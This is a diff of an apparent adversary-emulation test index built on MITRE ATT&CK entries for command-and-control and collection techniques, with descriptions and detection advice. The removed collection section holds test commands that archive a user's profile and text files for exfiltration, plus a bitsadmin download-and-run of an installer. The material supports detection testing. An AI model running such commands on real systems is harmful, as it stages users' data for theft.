+ Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
+
+ By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.
+ name: Internal Proxy
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1090.001
@@ -49828,39 +57867,24 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Internal Proxy
- description: |-
- Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
-
- By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.
- id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-15T00:46:26.598Z'
- created: '2020-03-14T23:08:20.244Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: 'Analyze network data for uncommon data flows between clients
- that should not or often do not communicate with one another. Processes utilizing
- the network that do not normally have network communication or have never
- been seen before are suspicious. Analyze packet contents to detect communications
- that do not follow the expected protocol behavior for the port that is being
- used.(Citation: University of Birmingham C2)'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_data_sources:
- Process use of network
- Process monitoring
- Network protocol analysis
- Netflow/Enclave netflow
- Packet capture
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_detection: 'Analyze network data for uncommon data flows between clients
+ that should not or often do not communicate with one another. Processes utilizing
+ the network that do not normally have network communication or have never
+ been seen before are suspicious. Analyze packet contents to detect communications
+ that do not follow the expected protocol behavior for the port that is being
+ used.(Citation: University of Birmingham C2)'
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1090.001
atomic_tests:
- name: Connection Proxy
@@ -49998,15 +58022,9 @@ command-and-control:
atomic_tests: []
T1071.003:
technique:
- created: '2020-03-15T16:21:45.131Z'
- modified: '2020-03-26T20:28:00.985Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- type: attack-pattern
id: attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b
description: "Adversaries may communicate using application layer protocols
- associated with electronic map delivery to avoid detection/network filtering
+ associated with electronic mail delivery to avoid detection/network filtering
by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic
between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP
@@ -50027,6 +58045,12 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-10-21T16:35:45.633Z'
+ created: '2020-03-15T16:21:45.131Z'
x_mitre_platforms:
- Linux
- macOS
@@ -50096,39 +58120,39 @@ command-and-control:
- source_name: mitre-attack
external_id: T1090.003
url: https://attack.mitre.org/techniques/T1090/003
+ - source_name: Onion Routing
+ url: https://en.wikipedia.org/wiki/Onion_routing
+ description: Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Multi-hop Proxy
- description: To disguise the source of malicious traffic, adversaries may chain
- together multiple proxies. Typically, a defender will be able to identify
- the last proxy traffic traversed before it enters their network; the defender
- may or may not be able to identify any previous proxies before the last-hop
- proxy. This technique makes identifying the original source of the malicious
- traffic even more difficult by requiring the defender to trace malicious traffic
- through several proxies to identify its source.
+ description: |-
+ To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
+
+ In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.
id: attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-14T23:23:41.770Z'
+ modified: '2020-10-21T17:54:28.280Z'
created: '2020-03-14T23:23:41.770Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
- x_mitre_detection: When observing use of Multi-hop proxies, network data from
- the actual command and control servers could allow correlating incoming and
- outgoing flows to trace malicious traffic back to its source. Multi-hop proxies
- can also be detected by alerting on traffic to known anonymity networks (such
- as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure
- that uses this technique.
+ x_mitre_detection: |-
+ When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.
+
+ In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.
x_mitre_data_sources:
+ - Packet capture
- Network protocol analysis
- Netflow/Enclave netflow
x_mitre_platforms:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1026:
technique:
@@ -50179,13 +58203,14 @@ command-and-control:
atomic_tests: []
T1095:
technique:
- id: attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Non-Application Layer Protocol
- description: |-
- Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
-
- ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ created: '2017-05-31T21:31:10.728Z'
+ modified: '2020-10-21T19:41:49.412Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1095
@@ -50194,34 +58219,33 @@ command-and-control:
description: Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved
December 4, 2014.
source_name: Wikipedia OSI
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
- url: http://support.microsoft.com/KB/170292
description: Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics.
Retrieved December 1, 2014.
source_name: Microsoft ICMP
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
- url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-11T15:09:26.624Z'
- created: '2017-05-31T21:31:10.728Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_network_requirements: true
- x_mitre_detection: |-
- Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.
+ description: |-
+ Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
- Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.
+ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)
+ Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ name: Non-Application Layer Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b
+ x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Ryan Becwar
x_mitre_data_sources:
- Host network interface
- Netflow/Enclave netflow
@@ -50229,9 +58253,23 @@ command-and-control:
- Network protocol analysis
- Packet capture
- Process use of network
- x_mitre_contributors:
- - Ryan Becwar
- x_mitre_version: '2.0'
+ x_mitre_detection: "Analyze network traffic for ICMP messages or other protocols
+ that contain abnormal data or are not normally seen within or exiting the
+ network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data
+ for uncommon data flows (e.g., a client sending significantly more data than
+ it receives from a server). Processes utilizing the network that do not normally
+ have network communication or have never been seen before are suspicious.
+ Analyze packet contents to detect communications that do not follow the expected
+ protocol behavior for the port that is being used.(Citation: University of
+ Birmingham C2) \n\nMonitor and investigate API calls to functions associated
+ with enabling and/or utilizing alternative communication channels."
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - Network
+ x_mitre_is_subtechnique: false
identifier: T1095
atomic_tests:
- name: ICMP C2
@@ -50548,9 +58586,9 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:23:25.002Z'
+ modified: '2020-10-21T01:26:31.804Z'
created: '2020-07-01T18:23:25.002Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -50563,6 +58601,7 @@ command-and-control:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1001.003:
technique:
@@ -50685,13 +58724,8 @@ command-and-control:
atomic_tests: []
T1090:
technique:
- id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Proxy
- description: |-
- Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
-
- Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1090
@@ -50704,34 +58738,40 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
+
+ Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
+ name: Proxy
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-06-20T20:53:20.670Z'
+ modified: '2020-10-21T17:54:28.531Z'
created: '2017-05-31T21:31:08.479Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_detection: |-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
- Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).
+ x_mitre_version: '3.1'
+ x_mitre_contributors:
+ - Brian Prange
+ - Heather Linn
+ - Walker Johnson
x_mitre_data_sources:
- SSL/TLS inspection
- Process use of network
- Process monitoring
- Netflow/Enclave netflow
- Packet capture
- x_mitre_contributors:
- - Brian Prange
- - Heather Linn
- - Walker Johnson
- x_mitre_version: '3.0'
+ x_mitre_detection: |-
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
+
+ Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1219:
technique:
@@ -51034,6 +59074,8 @@ command-and-control:
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
+
+ On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
external_references:
- source_name: mitre-attack
external_id: T1205
@@ -51042,6 +59084,18 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
@@ -51052,7 +59106,7 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:27:41.755Z'
+ modified: '2020-10-21T15:30:44.964Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_contributors:
- Josh Day, Gigamon
@@ -51065,12 +59119,13 @@ command-and-control:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_is_subtechnique: false
atomic_tests: []
T1071.001:
@@ -51251,2423 +59306,6 @@ command-and-control:
x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
atomic_tests: []
-collection:
- T1560:
- technique:
- created: '2020-02-20T20:53:45.725Z'
- modified: '2020-03-29T18:27:31.040Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
- description: |-
- An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
-
- Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
- name: Archive Collected Data
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1560
- url: https://attack.mitre.org/techniques/T1560
- - url: https://en.wikipedia.org/wiki/List_of_file_signatures
- description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
- April 22, 2016.
- source_name: Wikipedia File Header Signatures
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - File monitoring
- - Binary file metadata
- x_mitre_detection: |-
- Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- identifier: T1560
- atomic_tests:
- - name: Compress Data for Exfiltration With PowerShell
- auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597
- description: "An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration.\nWhen the test completes you should find
- the files from the $env:USERPROFILE directory compressed in a file called
- T1560-data-ps.zip in the $env:USERPROFILE directory \n"
- supported_platforms:
- - windows
- input_arguments:
- input_file:
- description: Path that should be compressed into our output file
- type: Path
- default: "$env:USERPROFILE"
- output_file:
- description: Path where resulting compressed data should be placed
- type: Path
- default: "$env:USERPROFILE\\T1560-data-ps.zip"
- executor:
- name: powershell
- elevation_required: false
- command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-
-'
- cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
- T1560.003:
- technique:
- created: '2020-02-20T21:09:55.995Z'
- modified: '2020-03-25T22:48:14.605Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
- description: 'An adversary may compress or encrypt data that is collected prior
- to exfiltration using a custom method. Adversaries may choose to use custom
- archival methods, such as encryption with XOR or stream ciphers implemented
- with no external library or utility references. Custom implementations of
- well-known compression algorithms have also been used.(Citation: ESET Sednit
- Part 2)'
- name: Archive via Custom Method
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1560.003
- url: https://attack.mitre.org/techniques/T1560/003
- - url: http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
- description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
- the Comings and Goings. Retrieved November 21, 2016.'
- source_name: ESET Sednit Part 2
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_detection: Custom archival methods can be very difficult to detect,
- since many of them use standard programming language concepts, such as bitwise
- operations.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- atomic_tests: []
- T1560.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1560.002
- url: https://attack.mitre.org/techniques/T1560/002
- - source_name: PyPI RAR
- url: https://pypi.org/project/rarfile/
- description: mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.
- - source_name: libzip
- url: https://libzip.org/
- description: D. Baron, T. Klausner. (2020). libzip. Retrieved February 20,
- 2020.
- - source_name: Zlib Github
- url: https://github.com/madler/zlib
- description: madler. (2017). zlib. Retrieved February 20, 2020.
- - url: https://en.wikipedia.org/wiki/List_of_file_signatures
- description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
- April 22, 2016.
- source_name: Wikipedia File Header Signatures
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive via Library
- description: |-
- An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
-
- Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.
- id: attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-29T18:27:30.891Z'
- created: '2020-02-20T21:08:52.529Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- atomic_tests: []
- T1560.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1560.001
- url: https://attack.mitre.org/techniques/T1560/001
- - source_name: 7zip Homepage
- url: https://www.7-zip.org/
- description: I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.
- - source_name: WinRAR Homepage
- url: https://www.rarlab.com/
- description: A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.
- - source_name: WinZip Homepage
- url: https://www.winzip.com/win/en/
- description: Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.
- - url: https://en.wikipedia.org/wiki/List_of_file_signatures
- description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
- April 22, 2016.
- source_name: Wikipedia File Header Signatures
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive via Utility
- description: |-
- An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
-
- Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.
- id: attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-25T21:54:37.374Z'
- created: '2020-02-20T21:01:25.428Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - File monitoring
- - Binary file metadata
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- identifier: T1560.001
- atomic_tests:
- - name: Compress Data for Exfiltration With Rar
- auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
- description: "An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration.\nWhen the test completes you should find
- the txt files from the %USERPROFILE% directory compressed in a file called
- T1560.001-data.rar in the %USERPROFILE% directory \n"
- supported_platforms:
- - windows
- input_arguments:
- input_path:
- description: Path that should be compressed into our output file
- type: Path
- default: "%USERPROFILE%"
- file_extension:
- description: Extension of files to compress
- type: String
- default: ".txt"
- output_file:
- description: Path where resulting compressed data should be placed
- type: Path
- default: "%USERPROFILE%\\T1560.001-data.rar"
- rar_installer:
- description: Winrar installer
- type: Path
- default: "%TEMP%\\winrar.exe"
- rar_exe:
- description: The RAR executable from Winrar
- type: Path
- default: "%programfiles%/WinRAR/Rar.exe"
- dependencies:
- - description: 'Rar tool must be installed at specified location (#{rar_exe})
-
-'
- prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
-
-'
- get_prereq_command: |
- echo Downloading Winrar installer
- bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
- echo Follow the installer prompts to install Winrar
- #{rar_installer}
- executor:
- name: command_prompt
- elevation_required: false
- command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
-
-'
- cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
-
-'
- - name: Compress Data and lock with password for Exfiltration with winrar
- auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
- description: |
- Note: Requires winrar installation
